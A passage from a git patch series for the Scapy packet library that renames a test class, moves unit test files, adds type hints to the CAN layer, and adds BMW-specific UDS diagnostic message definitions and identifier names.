HSFZ(b'\x00\x00\x00\x18\x00\x01\xf4\x10\x67\x01' + b"0" * 20 + b"p" * 100) assert pkt.length == 24 assert pkt.src == 0xf4 assert pkt.dst == 0x10 @@ -50,7 +50,7 @@ assert pkt.load == b'p' * 100 = Dissect Test to short packet -pkt = ENET(b'\x00\x00\x00\x18\x00\x01\xf4\x10\x67\x01' + b"0" * 19) +pkt = HSFZ(b'\x00\x00\x00\x18\x00\x01\xf4\x10\x67\x01' + b"0" * 19) assert pkt.length == 24 assert pkt.src == 0xf4 assert pkt.dst == 0x10 @@ -59,7 +59,7 @@ assert pkt.securitySeed == b"0" * 19 = Dissect Test very long packet -pkt = ENET(b'\x00\x0f\xff\x04\x00\x01\xf4\x10\x67\x01' + b"0" * 0xfff00) +pkt = HSFZ(b'\x00\x0f\xff\x04\x00\x01\xf4\x10\x67\x01' + b"0" * 0xfff00) assert pkt.length == 0xfff04 assert pkt.src == 0xf4 assert pkt.dst == 0x10 From a631d6f8108607a4d5b6d40098e7e57e6cddb1d7 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Fri, 16 Oct 2020 07:42:59 +0200 Subject: [PATCH 0324/1632] Unit tests housekeeping --- test/{ => scapy/layers}/bluetooth.uts | 0 test/{ => scapy/layers}/bluetooth4LE.uts | 0 test/{ => scapy/layers}/can.uts | 0 test/{ => scapy/layers}/dot15d4.uts | 0 test/{ => scapy/layers}/pptp.uts | 0 test/{ => scapy/layers}/smb.uts | 0 test/{ => scapy/layers}/smb2.uts | 0 test/{ => scapy/layers}/usb.uts | 0 test/{ => scapy/layers}/x509.uts | 0 9 files changed, 0 insertions(+), 0 deletions(-) rename test/{ => scapy/layers}/bluetooth.uts (100%) rename test/{ => scapy/layers}/bluetooth4LE.uts (100%) rename test/{ => scapy/layers}/can.uts (100%) rename test/{ => scapy/layers}/dot15d4.uts (100%) rename test/{ => scapy/layers}/pptp.uts (100%) rename test/{ => scapy/layers}/smb.uts (100%) rename test/{ => scapy/layers}/smb2.uts (100%) rename test/{ => scapy/layers}/usb.uts (100%) rename test/{ => scapy/layers}/x509.uts (100%) diff --git a/test/bluetooth.uts b/test/scapy/layers/bluetooth.uts similarity index 100% rename from test/bluetooth.uts rename to test/scapy/layers/bluetooth.uts diff --git a/test/bluetooth4LE.uts b/test/scapy/layers/bluetooth4LE.uts similarity index 100% rename from test/bluetooth4LE.uts rename to test/scapy/layers/bluetooth4LE.uts diff --git a/test/can.uts b/test/scapy/layers/can.uts similarity index 100% rename from test/can.uts rename to test/scapy/layers/can.uts diff --git a/test/dot15d4.uts b/test/scapy/layers/dot15d4.uts similarity index 100% rename from test/dot15d4.uts rename to test/scapy/layers/dot15d4.uts diff --git a/test/pptp.uts b/test/scapy/layers/pptp.uts similarity index 100% rename from test/pptp.uts rename to test/scapy/layers/pptp.uts diff --git a/test/smb.uts b/test/scapy/layers/smb.uts similarity index 100% rename from test/smb.uts rename to test/scapy/layers/smb.uts diff --git a/test/smb2.uts b/test/scapy/layers/smb2.uts similarity index 100% rename from test/smb2.uts rename to test/scapy/layers/smb2.uts diff --git a/test/usb.uts b/test/scapy/layers/usb.uts similarity index 100% rename from test/usb.uts rename to test/scapy/layers/usb.uts diff --git a/test/x509.uts b/test/scapy/layers/x509.uts similarity index 100% rename from test/x509.uts rename to test/scapy/layers/x509.uts From 313be436ddf82644293ba8bebbbe968c781128a0 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 17 Oct 2020 15:39:01 +0200 Subject: [PATCH 0325/1632] add typing for CAN --- .config/mypy/mypy_enabled.txt | 1 + scapy/fields.py | 4 +- scapy/layers/can.py | 81 ++++++++++++++++++++++++++++------- scapy/packet.py | 2 +- 4 files changed, 69 insertions(+), 19 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 9eb098aab4a..9c1cd37920f 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -14,3 +14,4 @@ scapy/fields.py scapy/packet.py scapy/plist.py scapy/contrib/roce.py +scapy/layers/can.py \ No newline at end of file diff --git a/scapy/fields.py b/scapy/fields.py index a33380a819d..de6b9b86ef6 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -3167,9 +3167,9 @@ class _ScalingField(object): def __init__(self, name, # type: str default, # type: float - scaling=1, # type: int + scaling=1, # type: Union[int, float] unit="", # type: str - offset=0, # type: int + offset=0, # type: Union[int, float] ndigits=3, # type: int fmt="B", # type: str ): diff --git a/scapy/layers/can.py b/scapy/layers/can.py index 8cc1ad3ac3e..ee850021e5d 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -13,6 +13,9 @@ import gzip import struct import binascii + +from typing import Tuple, Optional, Type, List, Union, Callable, IO, Any, cast + import scapy.modules.six as six from scapy.config import conf from scapy.compat import orb @@ -20,10 +23,11 @@ from scapy.fields import FieldLenField, FlagsField, StrLenField, \ ThreeBytesField, XBitField, ScalingField, ConditionalField, LenField from scapy.volatile import RandFloat, RandBinFloat -from scapy.packet import Packet, bind_layers +from scapy.packet import Packet, bind_layers, BasePacket from scapy.layers.l2 import CookedLinux from scapy.error import Scapy_Exception from scapy.plist import PacketList +from scapy.supersocket import SuperSocket __all__ = ["CAN", "SignalPacket", "SignalField", "LESignedSignalField", "LEUnsignedSignalField", "LEFloatSignalField", "BEFloatSignalField", @@ -47,11 +51,12 @@ class CAN(Packet): XBitField('identifier', 0, 29), FieldLenField('length', None, length_of='data', fmt='B'), ThreeBytesField('reserved', 0), - StrLenField('data', '', length_from=lambda pkt: pkt.length), + StrLenField('data', b'', length_from=lambda pkt: int(pkt.length)), ] @staticmethod def inv_endianness(pkt): + # type: (bytes) -> bytes """ Invert the order of the first four bytes of a CAN packet This method is meant to be used specifically to convert a CAN packet @@ -65,16 +70,20 @@ def inv_endianness(pkt): *struct.unpack('>I{}s'.format(len_partial), pkt)) def pre_dissect(self, s): + # type: (bytes) -> bytes """ Implements the swap-bytes functionality when dissecting """ if conf.contribs['CAN']['swap-bytes']: - return CAN.inv_endianness(s) + data = CAN.inv_endianness(s) # type: bytes + return data return s def post_dissect(self, s): + # type: (bytes) -> bytes self.raw_packet_cache = None # Reset packet to allow post_build return s def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes """ Implements the swap-bytes functionality when building this is based on a copy of the Packet.self_build default method. @@ -82,10 +91,12 @@ def post_build(self, pkt, pay): under layers (e.g LinuxCooked) unchanged """ if conf.contribs['CAN']['swap-bytes']: - return CAN.inv_endianness(pkt) + pay + data = CAN.inv_endianness(pkt) # type: bytes + return data + pay return pkt + pay def extract_padding(self, p): + # type: (bytes) -> Tuple[bytes, Optional[bytes]] return b'', p @@ -98,6 +109,7 @@ class SignalField(ScalingField): def __init__(self, name, default, start, size, scaling=1, unit="", offset=0, ndigits=3, fmt="B"): + # type: (str, Union[int, float], int, int, Union[int, float], str, Union[int, float], int, str) -> None # noqa: E501 ScalingField.__init__(self, name, default, scaling, unit, offset, ndigits, fmt) self.start = start @@ -117,37 +129,45 @@ def __init__(self, name, default, start, size, scaling=1, unit="", @staticmethod def _msb_lookup(start): + # type: (int) -> int return SignalField._lookup_table.index(start) @staticmethod def _lsb_lookup(start, size): + # type: (int, int) -> int return SignalField._lookup_table[SignalField._msb_lookup(start) + size - 1] @staticmethod def _convert_to_unsigned(number, bit_length): + # type: (int, int) -> int if number & (1 << (bit_length - 1)): - mask = (2 ** bit_length) + mask = (2 ** bit_length) # type: int return mask + number return number @staticmethod def _convert_to_signed(number, bit_length): - mask = (2 ** bit_length) - 1 + # type: (int, int) -> int + mask = (2 ** bit_length) - 1 # type: int if number & (1 << (bit_length - 1)): return number | ~mask return number & mask def _is_little_endian(self): + # type: () -> bool return self.fmt[0] == "<" def _is_signed_number(self): + # type: () -> bool return self.fmt[-1].islower() def _is_float_number(self): + # type: () -> bool return self.fmt[-1] == "f" def addfield(self, pkt, s, val): + # type: (BasePacket, bytes, Optional[Union[int, float]]) -> bytes if not isinstance(pkt, SignalPacket): raise Scapy_Exception("Only use SignalFields in a SignalPacket") @@ -169,17 +189,20 @@ def addfield(self, pkt, s, val): s += b"\x00" * (field_len - len(s)) if self._is_float_number(): - val = struct.unpack(self.fmt[0] + "I", - struct.pack(self.fmt, val))[0] + int_val = struct.unpack(self.fmt[0] + "I", + struct.pack(self.fmt, val))[0] # type: int elif self._is_signed_number(): - val = self._convert_to_unsigned(val, self.size) + int_val = self._convert_to_unsigned(int(val), self.size) + else: + int_val = cast(int, val) pkt_val = struct.unpack(fmt, (s + b"\x00" * 8)[:8])[0] - pkt_val |= val << shift + pkt_val |= int_val << shift tmp_s = struct.pack(fmt, pkt_val) return tmp_s[:len(s)] def getfield(self, pkt, s): + # type: (BasePacket, bytes) -> Tuple[bytes, Union[int, float]] if not isinstance(pkt, SignalPacket): raise Scapy_Exception("Only use SignalFields in a SignalPacket") @@ -216,6 +239,7 @@ def getfield(self, pkt, s): return s, self.m2i(pkt, fld_val) def randval(self): + # type: () -> Union[RandBinFloat, RandFloat] if self._is_float_number(): return RandBinFloat(0, 0) @@ -232,12 +256,14 @@ def randval(self): return RandFloat(min(min_val, max_val), max(min_val, max_val)) def i2len(self, pkt, x): - return float(self.size) / 8 + # type: (BasePacket, Any) -> int + return int(float(self.size) / 8) class LEUnsignedSignalField(SignalField): def __init__(self, name, default, start, size, scaling=1, unit="", offset=0, ndigits=3): + # type: (str, Union[int, float], int, int, Union[int, float], str, Union[int, float], int) -> None # noqa: E501 SignalField.__init__(self, name, default, start, size, scaling, unit, offset, ndigits, " None # noqa: E501 SignalField.__init__(self, name, default, start, size, scaling, unit, offset, ndigits, " None # noqa: E501 SignalField.__init__(self, name, default, start, size, scaling, unit, offset, ndigits, ">B") @@ -259,6 +287,7 @@ def __init__(self, name, default, start, size, scaling=1, unit="", class BESignedSignalField(SignalField): def __init__(self, name, default, start, size, scaling=1, unit="", offset=0, ndigits=3): + # type: (str, Union[int, float], int, int, Union[int, float], str, Union[int, float], int) -> None # noqa: E501 SignalField.__init__(self, name, default, start, size, scaling, unit, offset, ndigits, ">b") @@ -266,6 +295,7 @@ def __init__(self, name, default, start, size, scaling=1, unit="", class LEFloatSignalField(SignalField): def __init__(self, name, default, start, scaling=1, unit="", offset=0, ndigits=3): + # type: (str, Union[int, float], int, Union[int, float], str, Union[int, float], int) -> None # noqa: E501 SignalField.__init__(self, name, default, start, 32, scaling, unit, offset, ndigits, " None # noqa: E501 SignalField.__init__(self, name, default, start, 32, scaling, unit, offset, ndigits, ">f") class SignalPacket(Packet): def pre_dissect(self, s): + # type: (bytes) -> bytes if not all(isinstance(f, SignalField) or (isinstance(f, ConditionalField) and isinstance(f.fld, SignalField)) @@ -287,12 +319,13 @@ def pre_dissect(self, s): return s def post_dissect(self, s): + # type: (bytes) -> bytes """ SignalFields can be dissected on packets with unordered fields. The order of SignalFields is defined from the start parameter. After a build, the consumed bytes of the length of all SignalFields have to be removed from the SignalPacket. """ - if self.wirelen > 8: + if self.wirelen is not None and self.wirelen > 8: raise Scapy_Exception("Only 64 bits for all SignalFields " "are supported") self.raw_packet_cache = None # Reset packet to allow post_build @@ -310,10 +343,12 @@ class SignalHeader(CAN): ] def extract_padding(self, s): + # type: (bytes) -> Tuple[bytes, Optional[bytes]] return s, None def rdcandump(filename, count=-1, interface=None): + # type: (str, int, Optional[str]) -> PacketList """Read a candump log file and return a packet list filename: file to read @@ -330,21 +365,25 @@ class CandumpReader: nonblocking_socket = True def __init__(self, filename, interface=None): + # type: (str, Optional[Union[List[str], str]]) -> None self.filename, self.f = self.open(filename) - self.ifilter = None + self.ifilter = None # type: Optional[List[str]] if interface is not None: if isinstance(interface, six.string_types): self.ifilter = [interface] else: - self.ifilter = interface + self.ifilter = cast(List[str], interface) def __iter__(self): + # type: () -> CandumpReader return self @staticmethod def open(filename): + # type: (Union[IO[Any], str]) -> Tuple[str, IO[Any]] """Open (if necessary) filename.""" if isinstance(filename, six.string_types): + filename = cast(str, filename) try: fdesc = gzip.open(filename, "rb") # try read to cause exception @@ -353,11 +392,12 @@ def open(filename): except IOError: fdesc = open(filename, "rb") else: - fdesc = filename + fdesc = cast(IO[Any], filename) filename = getattr(fdesc, "name", "No name") - return filename, fdesc + return cast(str, filename), fdesc def next(self): + # type: () -> BasePacket """implement the iterator protocol on a set of packets """ try: @@ -371,6 +411,7 @@ def next(self): __next__ = next def read_packet(self, size=MTU): + # type: (int) -> Optional[BasePacket] """return a single packet read from the file or None if filters apply raise EOFError when no more packets are available @@ -414,6 +455,7 @@ def read_packet(self, size=MTU): return pkt def dispatch(self, callback): + # type: (Callable[[Packet], None]) -> None """call the specified callback routine for each packet read This is just a convenience function for the main loop @@ -424,6 +466,7 @@ def dispatch(self, callback): callback(p) def read_all(self, count=-1): + # type: (int) -> PacketList """return a list of all packets in the candump file """ res = [] @@ -439,23 +482,29 @@ def read_all(self, count=-1): return PacketList(res, name=os.path.basename(self.filename)) def recv(self, size=MTU): + # type: (int) -> Optional[BasePacket] """ Emulate a socket """ return self.read_packet(size=size) def fileno(self): + # type: () -> int return self.f.fileno() def close(self): + # type: () -> Any return self.f.close() def __enter__(self): + # type: () -> CandumpReader return self def __exit__(self, exc_type, exc_value, tracback): + # type: (Optional[Type[BaseException]], Optional[BaseException], Optional[Any]) -> None # noqa: E501 self.close() # emulate SuperSocket @staticmethod def select(sockets, remain=None): + # type: (List[SuperSocket], Optional[int]) -> Tuple[List[SuperSocket], None] # noqa: E501 return sockets, None diff --git a/scapy/packet.py b/scapy/packet.py index fa58b64cb4c..f19797cae35 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -929,7 +929,7 @@ def make_dump(s, # type: bytes return canvas def extract_padding(self, s): - # type: (bytes) -> Tuple[bytes, None] + # type: (bytes) -> Tuple[bytes, Optional[bytes]] """ DEV: to be overloaded to extract current layer's padding. From aa4b6b46be97a3e6f3aff66ad769a16767785c69 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 13 Oct 2020 09:44:03 +0200 Subject: [PATCH 0326/1632] Improvements and cleanups of BMW specific definitions --- scapy/contrib/automotive/bmw/definitions.py | 219 ++++++++++++++++---- 1 file changed, 177 insertions(+), 42 deletions(-) diff --git a/scapy/contrib/automotive/bmw/definitions.py b/scapy/contrib/automotive/bmw/definitions.py index 017526ea599..2ca3e12fde8 100644 --- a/scapy/contrib/automotive/bmw/definitions.py +++ b/scapy/contrib/automotive/bmw/definitions.py @@ -9,7 +9,8 @@ from scapy.packet import Packet, bind_layers from scapy.fields import ByteField, ShortField, ByteEnumField, X3BytesField, \ - StrField, StrFixedLenField, LEIntField, LEThreeBytesField, PacketListField + StrField, StrFixedLenField, LEIntField, LEThreeBytesField, \ + PacketListField, IntField, IPField, ThreeBytesField, ShortEnumField from scapy.contrib.automotive.uds import UDS, UDS_RDBI, UDS_DSC, UDS_IOCBI, \ UDS_RC, UDS_RD, UDS_RSDBI, UDS_RDBIPR @@ -282,6 +283,95 @@ class SVK(Packet): count_from=lambda x: x.entries_count)] +class DIAG_SESSION_RESP(Packet): + fields_desc = [ + ByteField('DIAG_SESSION_VALUE', 0), + StrField('DIAG_SESSION_TEXT', '') + ] + + +class IP_CONFIG_RESP(Packet): + fields_desc = [ + ByteField('ADDRESS_FORMAT_ID', 0), + IPField('IP', ''), + IPField('SUBNETMASK', ''), + IPField('DEFAULT_GATEWAY', '') + ] + + +bind_layers(UDS_RDBIPR, IP_CONFIG_RESP, dataIdentifier=0x172a) +bind_layers(UDS_RDBIPR, DIAG_SESSION_RESP, dataIdentifier=0xf186) + + +class DEV_JOB(Packet): + identifiers = { + 0x51F1: "ControlReciprocalMonitor", + 0xCADD: "EnableDebugCan", + 0xDEAD: "LockJtag1", + 0xDEAE: "LockJtag2", + 0xDEAF: "UnlockJtag", + 0xF510: "ControlFuSiIO", + 0xFF00: "ReadTransportMessageStatus", + 0xFF10: "ControlEthernetActivation", + 0xFF51: "ControlPwfMaster", + 0xFF66: "ControlWebsite", + 0xFF77: "ControlIdleMessage", + 0xFFB0: "ReadManufacturerData", + 0xFFB1: "ReadBuildNumber", + 0xFFD0: "ReadFzmSentryStates", + 0xFFD1: "ReadFzmSlaveStates", + 0xFFD2: "ReadFzmMasterState", + 0xFFD3: "ControlLifecycle", + 0xFFD5: "IsCertificateValid", + 0xFFFA: "SetDiagRouting", + 0xFFFF: "ReadMemory"} + fields_desc = [ + ShortEnumField('identifier', 0xffff, identifiers) + ] + + +class DEV_JOB_PR(Packet): + fields_desc = [ + ShortEnumField('identifier', 0xffff, DEV_JOB.identifiers) + ] + + def answers(self, other): + return other.__class__ == DEV_JOB \ + and self.identifier == other.identifier + + +UDS.services[0xBF] = "DevelopmentJob" +UDS.services[0xFF] = "DevelopmentJobPositiveResponse" +bind_layers(UDS, DEV_JOB, service=0xBF) +bind_layers(UDS, DEV_JOB_PR, service=0xFF) + + +class READ_MEM(Packet): + fields_desc = [ + IntField('read_addr', 0), + IntField('read_length', 0) + ] + + +class READ_MEM_PR(Packet): + fields_desc = [ + StrField('data', ''), + ] + + +class WEBSERVER(Packet): + fields_desc = [ + ByteField('enable', 1), + ThreeBytesField('password', b'123') + ] + + +bind_layers(DEV_JOB, WEBSERVER, identifier=0xff66) +bind_layers(DEV_JOB_PR, WEBSERVER, identifier=0xff66) +bind_layers(DEV_JOB, READ_MEM, identifier=0xffff) +bind_layers(DEV_JOB_PR, READ_MEM_PR, identifier=0xffff) + + bind_layers(UDS_RDBIPR, SVK, dataIdentifier=0xf101) bind_layers(UDS_RDBIPR, SVK, dataIdentifier=0xf102) bind_layers(UDS_RDBIPR, SVK, dataIdentifier=0xf103) @@ -351,7 +441,7 @@ class SVK(Packet): UDS_RDBI.dataIdentifiers[0x0014] = "RDBCI_IS_LESEN_DETAIL_REQ" UDS_RDBI.dataIdentifiers[0x0015] = "RDBCI_HS_LESEN_DETAIL_REQ" UDS_RDBI.dataIdentifiers[0x0e80] = "AirbagLock" -UDS_RDBI.dataIdentifiers[0x1000] = "testStamp" +UDS_RDBI.dataIdentifiers[0x1000] = "TestStamp" UDS_RDBI.dataIdentifiers[0x1001] = "CBSdata" UDS_RDBI.dataIdentifiers[0x1002] = "smallUserInformationField" UDS_RDBI.dataIdentifiers[0x1003] = "smallUserInformationField" @@ -361,8 +451,8 @@ class SVK(Packet): UDS_RDBI.dataIdentifiers[0x1007] = "smallUserInformationField" UDS_RDBI.dataIdentifiers[0x1008] = "smallUserInformationFieldBMWfast" UDS_RDBI.dataIdentifiers[0x1009] = "vehicleProductionDate" -UDS_RDBI.dataIdentifiers[0x100a] = "energySavingState" # or EnergyMode -UDS_RDBI.dataIdentifiers[0x100b] = "Istep" # or I-Stufe +UDS_RDBI.dataIdentifiers[0x100A] = "EnergyMode" +UDS_RDBI.dataIdentifiers[0x100B] = "VcmIntegrationStep" UDS_RDBI.dataIdentifiers[0x100d] = "gatewayTableVersionNumber" UDS_RDBI.dataIdentifiers[0x100e] = "ExtendedMode" UDS_RDBI.dataIdentifiers[0x1010] = "fullVehicleIdentificationNumber" @@ -637,10 +727,15 @@ class SVK(Packet): UDS_RDBI.dataIdentifiers[0x16fd] = "SubbusMemberSerialNumber" UDS_RDBI.dataIdentifiers[0x16fe] = "SubbusMemberSerialNumber" UDS_RDBI.dataIdentifiers[0x16ff] = "SubbusMemberSerialNumber" -UDS_RDBI.dataIdentifiers[0x171f] = "Certificate" -UDS_RDBI.dataIdentifiers[0x172a] = "IPIdent" -UDS_RDBI.dataIdentifiers[0x1734] = "IndividualDataIDTable" -UDS_RDBI.dataIdentifiers[0x1735] = "StatusLifeCycle" +UDS_RDBI.dataIdentifiers[0x1701] = "SysTime" +UDS_RDBI.dataIdentifiers[0x170C] = "BoardPowerSupply" +UDS_RDBI.dataIdentifiers[0x171F] = "Certificate" +UDS_RDBI.dataIdentifiers[0x1720] = "SCVersion" +UDS_RDBI.dataIdentifiers[0x1723] = "ActiveResponseDTCs" +UDS_RDBI.dataIdentifiers[0x1724] = "LockableDTCs" +UDS_RDBI.dataIdentifiers[0x172A] = "IPConfiguration" +UDS_RDBI.dataIdentifiers[0x172B] = "MACAddress" +UDS_RDBI.dataIdentifiers[0x1735] = "LifecycleMode" UDS_RDBI.dataIdentifiers[0x2000] = "dtcShadowMemory" UDS_RDBI.dataIdentifiers[0x2001] = "dtcShadowMemoryEntry" UDS_RDBI.dataIdentifiers[0x2002] = "dtcShadowMemoryEntry" @@ -1730,57 +1825,69 @@ class SVK(Packet): UDS_RDBI.dataIdentifiers[0x243e] = "additionalPersonalizationDataDriver3" UDS_RDBI.dataIdentifiers[0x243f] = "additionalPersonalizationDataDriver3" UDS_RDBI.dataIdentifiers[0x2500] = "programmReferenzBackup/vehicleManufacturerECUHW_NrBackup" # noqa E501 -UDS_RDBI.dataIdentifiers[0x2501] = "eraseTime, signatureTime, resetTime, authentificationTime" # or memorySegmentationTable # noqa E501 -UDS_RDBI.dataIdentifiers[0x2502] = "hardwareReferenz" # or programmingCounter # noqa E501 -UDS_RDBI.dataIdentifiers[0x2503] = "programmingCounter-MaxValue" # or programmReferenz # noqa E501 -UDS_RDBI.dataIdentifiers[0x2504] = "flashTimingParameter" # or datenReferenz # noqa E501 -UDS_RDBI.dataIdentifiers[0x2505] = "maximumBlocklength" +UDS_RDBI.dataIdentifiers[0x2501] = "MemorySegmentationTable" +UDS_RDBI.dataIdentifiers[0x2502] = "ProgrammingCounter" +UDS_RDBI.dataIdentifiers[0x2503] = "ProgrammingCounterMax" +UDS_RDBI.dataIdentifiers[0x2504] = "FlashTimings" +UDS_RDBI.dataIdentifiers[0x2505] = "MaxBlocklength" UDS_RDBI.dataIdentifiers[0x2506] = "ReadMemoryAddress" # or maximaleBlockLaenge # noqa E501 UDS_RDBI.dataIdentifiers[0x2507] = "EcuSupportsDeleteSwe" UDS_RDBI.dataIdentifiers[0x2508] = "GWRoutingStatus" UDS_RDBI.dataIdentifiers[0x2509] = "RoutingTable" +UDS_RDBI.dataIdentifiers[0x2530] = "SubnetStatus" UDS_RDBI.dataIdentifiers[0x2541] = "STATUS_CALCVN" UDS_RDBI.dataIdentifiers[0x3000] = "RDBI_CD_REQ" # or WDBI_CD_REQ UDS_RDBI.dataIdentifiers[0x300a] = "Codier-VIN" UDS_RDBI.dataIdentifiers[0x37fe] = "Codierpruefstempel" UDS_RDBI.dataIdentifiers[0x3f00] = "SVT-Ist" UDS_RDBI.dataIdentifiers[0x3f01] = "SVT-Soll" -UDS_RDBI.dataIdentifiers[0x3f02] = "SGListeSecurity" -UDS_RDBI.dataIdentifiers[0x3f03] = "SG-Liste SWT" -UDS_RDBI.dataIdentifiers[0x3f04] = "Zeitstempel" -UDS_RDBI.dataIdentifiers[0x3f05] = "Liste aller Seriennummern" -UDS_RDBI.dataIdentifiers[0x3f06] = "FA" -UDS_RDBI.dataIdentifiers[0x3f07] = "SGListeKomplett" -UDS_RDBI.dataIdentifiers[0x3f08] = "SGListeAktivesMelden" -UDS_RDBI.dataIdentifiers[0x3f09] = "FP" -UDS_RDBI.dataIdentifiers[0x3f0a] = "SGListeDifferentiellProg" -UDS_RDBI.dataIdentifiers[0x3f0b] = "SGListeNGSC" -UDS_RDBI.dataIdentifiers[0x3f0c] = "SGListeCodierrelevantesSG" -UDS_RDBI.dataIdentifiers[0x3f0d] = "SGListeFlashfaehigesSG" -UDS_RDBI.dataIdentifiers[0x3f0e] = "SGListeK_CAN" -UDS_RDBI.dataIdentifiers[0x3f0f] = "SGListeBody_CAN" -UDS_RDBI.dataIdentifiers[0x3f10] = "SGListeI_CAN" -UDS_RDBI.dataIdentifiers[0x3f11] = "SGListeMOST" -UDS_RDBI.dataIdentifiers[0x3f12] = "SGListeFA_CAN" -UDS_RDBI.dataIdentifiers[0x3f13] = "SGListeFlexRay" -UDS_RDBI.dataIdentifiers[0x3f14] = "SGListeA_CAN" -UDS_RDBI.dataIdentifiers[0x3f15] = "SGListeISO14229" -UDS_RDBI.dataIdentifiers[0x3f16] = "SGListeS_CAN" -UDS_RDBI.dataIdentifiers[0x3f17] = "SGListeEthernet" -UDS_RDBI.dataIdentifiers[0x3f18] = "SGListeD_CAN" -UDS_RDBI.dataIdentifiers[0x3f19] = "Identifikation VCM" -UDS_RDBI.dataIdentifiers[0x3f1a] = "SVT-Version" +UDS_RDBI.dataIdentifiers[0x3F02] = "VcmEcuListSecurity" +UDS_RDBI.dataIdentifiers[0x3F03] = "VcmEcuListSwt" +UDS_RDBI.dataIdentifiers[0x3F04] = "VcmNotificationTimeStamp" +UDS_RDBI.dataIdentifiers[0x3F05] = "VcmSerialNumberReferenceList" +UDS_RDBI.dataIdentifiers[0x3F06] = "VcmVehicleOrder" +UDS_RDBI.dataIdentifiers[0x3F07] = "VcmEcuListAll" +UDS_RDBI.dataIdentifiers[0x3F08] = "VcmEcuListActiveResponse" +UDS_RDBI.dataIdentifiers[0x3F09] = "VcmVehicleProfile" +UDS_RDBI.dataIdentifiers[0x3F0A] = "VcmEcuListDiffProg" +UDS_RDBI.dataIdentifiers[0x3F0B] = "VcmEcuListNgsc" +UDS_RDBI.dataIdentifiers[0x3F0C] = "VcmEcuListCodingRelevant" +UDS_RDBI.dataIdentifiers[0x3F0D] = "VcmEcuListFlashable" +UDS_RDBI.dataIdentifiers[0x3F0E] = "VcmEcuListKCan" +UDS_RDBI.dataIdentifiers[0x3F0F] = "VcmEcuListBodyCan" +UDS_RDBI.dataIdentifiers[0x3F10] = "VcmEcuListSFCan" +UDS_RDBI.dataIdentifiers[0x3F11] = "VcmEcuListMost" +UDS_RDBI.dataIdentifiers[0x3F12] = "VcmEcuListFaCan" +UDS_RDBI.dataIdentifiers[0x3F13] = "VcmEcuListFlexray" +UDS_RDBI.dataIdentifiers[0x3F14] = "VcmEcuListACan" +UDS_RDBI.dataIdentifiers[0x3F15] = "VcmEcuListIso14229" +UDS_RDBI.dataIdentifiers[0x3F16] = "VcmEcuListSCan" +UDS_RDBI.dataIdentifiers[0x3F17] = "VcmEcuListEthernet" +UDS_RDBI.dataIdentifiers[0x3F18] = "VcmEcuListDCan" +UDS_RDBI.dataIdentifiers[0x3F19] = "VcmVcmIdentification" +UDS_RDBI.dataIdentifiers[0x3F1A] = "VcmSvtVersion" UDS_RDBI.dataIdentifiers[0x3f1b] = "vehicleOrder_3F00_3FFE" UDS_RDBI.dataIdentifiers[0x3f1c] = "FA_Teil1" UDS_RDBI.dataIdentifiers[0x3f1d] = "FA_Teil2" UDS_RDBI.dataIdentifiers[0x3fff] = "changeIndexOfCodingData" +UDS_RDBI.dataIdentifiers[0x4000] = "GWTableVersion" +UDS_RDBI.dataIdentifiers[0x4001] = "WakeupSource" +UDS_RDBI.dataIdentifiers[0x4020] = "StatusLearnFlexray" +UDS_RDBI.dataIdentifiers[0x4021] = "StatusFlexrayPath" +UDS_RDBI.dataIdentifiers[0x4030] = "EthernetRegisters" +UDS_RDBI.dataIdentifiers[0x4031] = "EthernetStatusInformation" UDS_RDBI.dataIdentifiers[0x403c] = "STATUS_CALCVN_EA" +UDS_RDBI.dataIdentifiers[0x4040] = "DemLockingMasterState" +UDS_RDBI.dataIdentifiers[0x4050] = "AmbiguousRoutings" UDS_RDBI.dataIdentifiers[0x4080] = "AirbagLock_NEU" +UDS_RDBI.dataIdentifiers[0x4140] = "BodyComConfig" UDS_RDBI.dataIdentifiers[0x4ab4] = "Betriebsstundenzaehler" UDS_RDBI.dataIdentifiers[0x5fc2] = "WDBI_DME_ABGLEICH_PROG_REQ" UDS_RDBI.dataIdentifiers[0xd114] = "Gesamtweg-Streckenzähler Offset" UDS_RDBI.dataIdentifiers[0xd387] = "STATUS_DIEBSTAHLSCHUTZ" UDS_RDBI.dataIdentifiers[0xdb9c] = "InitStatusEngineAngle" +UDS_RDBI.dataIdentifiers[0xEFE9] = "WakeupRegistry" +UDS_RDBI.dataIdentifiers[0xEFE8] = "ClearWakeupRegistry" UDS_RDBI.dataIdentifiers[0xf000] = "networkConfigurationDataForTractorTrailerApplication" # noqa E501 UDS_RDBI.dataIdentifiers[0xf001] = "networkConfigurationDataForTractorTrailerApplication" # noqa E501 UDS_RDBI.dataIdentifiers[0xf002] = "networkConfigurationDataForTractorTrailerApplication" # noqa E501 @@ -2038,9 +2145,9 @@ class SVK(Packet): UDS_RDBI.dataIdentifiers[0xf0fe] = "networkConfigurationData" UDS_RDBI.dataIdentifiers[0xf0ff] = "networkConfigurationData" UDS_RDBI.dataIdentifiers[0xf100] = "activeSessionState" -UDS_RDBI.dataIdentifiers[0xf101] = "SVK_Aktuell" -UDS_RDBI.dataIdentifiers[0xf102] = "SVK_SystemSupplier" -UDS_RDBI.dataIdentifiers[0xf103] = "SVK_Werk" +UDS_RDBI.dataIdentifiers[0xF101] = "SVKCurrent" +UDS_RDBI.dataIdentifiers[0xF102] = "SVKSystemSupplier" +UDS_RDBI.dataIdentifiers[0xF103] = "SVKFactory" UDS_RDBI.dataIdentifiers[0xf104] = "SVK_Backup_01" UDS_RDBI.dataIdentifiers[0xf105] = "SVK_Backup_02" UDS_RDBI.dataIdentifiers[0xf106] = "SVK_Backup_03" @@ -4743,6 +4850,9 @@ class SVK(Packet): UDS_RC.routineControlIdentifiers[0x0233] = "GetParameterN11" UDS_RC.routineControlIdentifiers[0x0234] = "ExternerInit" UDS_RC.routineControlIdentifiers[0x02a5] = "RequestListEntry" +UDS_RC.routineControlIdentifiers[0x0303] = "DiagLoopbackStart" +UDS_RC.routineControlIdentifiers[0x0304] = "DTC" +UDS_RC.routineControlIdentifiers[0x0305] = "STEUERN_DM_FSS_MASTER" UDS_RC.routineControlIdentifiers[0x0f01] 